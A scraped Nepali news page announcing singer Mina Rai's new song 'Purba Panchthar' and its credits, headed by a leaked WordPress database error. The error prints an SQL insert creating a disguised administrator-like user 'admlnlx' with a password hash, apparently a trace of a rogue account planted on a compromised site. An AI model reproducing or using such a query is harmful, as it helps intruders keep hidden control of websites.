WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B37qcZne7naFZZV9bMI2VQwRNeknp90', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 20:03:47', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । गायिका मिना राईको नयाँ गीत सार्वजनिक भएको छ । गायिका राईले आफनै संगितमा शनिबार ‘पूर्व पाँचथर’ बोलको पूर्वेली गीत सार्वजनिक गरेकी हुन् ।
आयुष लावतीको शब्द, गायीका मिना राई र भैरव लिम्बुले स्वार रहेको गीतमा सगीत सम्योजन कृष्ण भक्त राईको रहेको छ ।
गीतको मिक्सिङ मिन बिष्टले गरेका छन् भने भर्जिन भ्वाईस रेकर्डिङ स्टडियोमा रेर्केड गरिएको हो । स्टुडियो भिडियोसहित सार्वजनिक गरिएको भिडियोको छायाँकन र सम्पादन गंगाराम राईले गरेका छन ।